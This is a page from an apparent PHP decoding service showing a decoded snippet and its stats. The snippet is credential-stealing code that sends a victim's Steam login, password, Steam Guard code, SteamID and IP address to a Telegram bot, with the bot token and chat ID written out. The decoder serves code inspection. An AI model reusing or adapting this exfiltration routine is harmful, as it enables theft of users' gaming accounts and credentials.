Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$token = '652538136:AAGKjuuNuH3IDsGL-V4zt8ZcuJafn8FFuYg'; $chatid = '459845750'; $send..
Decoded Output download
<? $token = '652538136:AAGKjuuNuH3IDsGL-V4zt8ZcuJafn8FFuYg';
$chatid = '459845750';
$send = file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chatid&parse_mode=html&text=%0ANEW LOG! {$this->bd->addRow}%0ALogin: {$login}%0APassword: {$pass}%0AGuard: {$guard}%0ASpammer: {$spammer}%0ASteamID: https://steamcommunity.com/profiles/{$steamid}%0AIP: {$ip}%0ASite: {$_SERVER["SERVER_NAME"]}"); ?>
Did this file decode correctly?
Original Code
$token = '652538136:AAGKjuuNuH3IDsGL-V4zt8ZcuJafn8FFuYg';
$chatid = '459845750';
$send = file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chatid&parse_mode=html&text=%0ANEW LOG! {$this->bd->addRow}%0ALogin: {$login}%0APassword: {$pass}%0AGuard: {$guard}%0ASpammer: {$spammer}%0ASteamID: https://steamcommunity.com/profiles/{$steamid}%0AIP: {$ip}%0ASite: {$_SERVER["SERVER_NAME"]}");
Function Calls
None |
Stats
MD5 | c9208534741729cdc3a3cabb1b6b3eca |
Eval Count | 0 |
Decode Time | 87 ms |